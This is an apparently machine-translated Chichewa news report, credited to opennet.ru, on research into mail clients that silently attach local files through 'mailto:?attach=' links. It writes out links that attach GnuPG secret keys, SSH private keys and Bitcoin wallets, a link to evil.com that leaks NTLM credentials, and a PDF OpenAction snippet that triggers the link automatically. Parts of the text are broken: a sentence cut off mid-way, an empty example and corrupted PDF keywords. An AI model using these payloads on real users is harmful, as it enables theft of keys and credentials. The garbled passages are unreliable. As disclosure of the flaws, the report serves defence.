Ofufuza ochokera ku Ruhr University Bochum (Germany)
Maulalo Β«
Makasitomala amakalata a Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ndi Pegasus Mail anali pachiwopsezo chachiwopsezo chaching'ono chomwe chimakulolani kuti mungolumikiza zokha. Fayilo iliyonse yapafupi, yotchulidwa kudzera pa ulalo ngati "mailto:?attach=path_to_file". Fayiloyo imamangirizidwa popanda kuwonetsa chenjezo, kotero popanda chidwi chapadera, wogwiritsa ntchitoyo sangazindikire kuti kalatayo idzatumizidwa ndi chomata.
Mwachitsanzo, kugwiritsa ntchito ulalo ngati "mailto:[imelo ndiotetezedwa]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" mutha kuyika makiyi achinsinsi kuchokera ku GnuPG mu chilembocho. Mutha kutumizanso zomwe zili m'matumba a crypto (~/.bitcoin/wallet.dat), makiyi a SSH (~/.ssh/id_rsa) ndi mafayilo aliwonse omwe wogwiritsa ntchito angawapeze. Komanso, Thunderbird imakulolani kuti muphatikize magulu a mafayilo ndi chigoba pogwiritsa ntchito zomangamanga monga "attach=/tmp/*.txt".
Kuphatikiza pa mafayilo am'deralo, makasitomala ena a imelo amakonza maulalo osungira ma netiweki ndi njira mu seva ya IMAP. Makamaka, IBM Notes imakupatsani mwayi wosinthira fayilo kuchokera pamanetiweki mukakonza maulalo ngati "attach=\\evil.com\dummyfile", komanso kuletsa magawo otsimikizika a NTLM potumiza ulalo ku seva ya SMB yoyendetsedwa ndi wowukira. (chopemphacho chidzatumizidwa ndi wogwiritsa ntchito zovomerezeka zamakono).
Thunderbird imayendetsa bwino zopempha monga "attach=imap:///fetch>UID>/INBOX>1/", zomwe zimakupatsani mwayi wolumikiza zomwe zili muzikwatu pa seva ya IMAP. Nthawi yomweyo, mauthenga otengedwa kuchokera ku IMAP, osungidwa kudzera pa OpenPGP ndi S/MIME, amasinthidwa ndi kasitomala wamakalata asanatumize. Opanga Thunderbird anali
Mitundu yakale ya Thunderbird inalinso pachiwopsezo chamitundu ina iwiri yowukira pa PGP ndi S/MIME yoperekedwa ndi ofufuza. Makamaka, Thunderbird, komanso OutLook, PostBox, eM Client, MailMate ndi R2Mail2, anali ndi vuto lalikulu lolowa m'malo, chifukwa chakuti kasitomala amatumiza ndikuyika ziphaso zatsopano zomwe zimatumizidwa mu mauthenga a S/MIME, zomwe zimalola. wowukirayo kuti akonze zolowa m'malo mwa makiyi a anthu omwe asungidwa kale ndi wogwiritsa ntchito.
Kuwukira kwachiwiri, komwe Thunderbird, PostBox ndi MailMate amatha kutengeka, kumagwiritsa ntchito mawonekedwe a makina osungira mauthenga ndikulola, pogwiritsa ntchito magawo a mailto, kuyambitsa kutulutsa kwa mauthenga obisika kapena kuwonjezera siginecha ya digito pa mauthenga osagwirizana, ndi kutumiza zotsatira ku seva ya IMAP ya wowukirayo. Pachiwopsezo ichi, ciphertext imafalitsidwa kudzera pa "thupi" parameter, ndipo chizindikiro cha "meta refresh" chimagwiritsidwa ntchito kuyambitsa kuyimba kwa seva ya IMAP ya wowukirayo. Mwachitsanzo: ' '
Kuti muthane ndi maulalo a "mailto:" osagwiritsa ntchito ogwiritsa ntchito, zikalata za PDF zopangidwa mwapadera zitha kugwiritsidwa ntchito - OpenAction action mu PDF imakupatsani mwayi wotsegulira mailto mukatsegula chikalata:
%PDF-1.5
1 0obb
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0obb
<< /Type /Action /S /URI/URI (mailto:?body=ββYAMBANI PGP MESSAGEββ[β¦])>>
endobj
Source: opennet.ru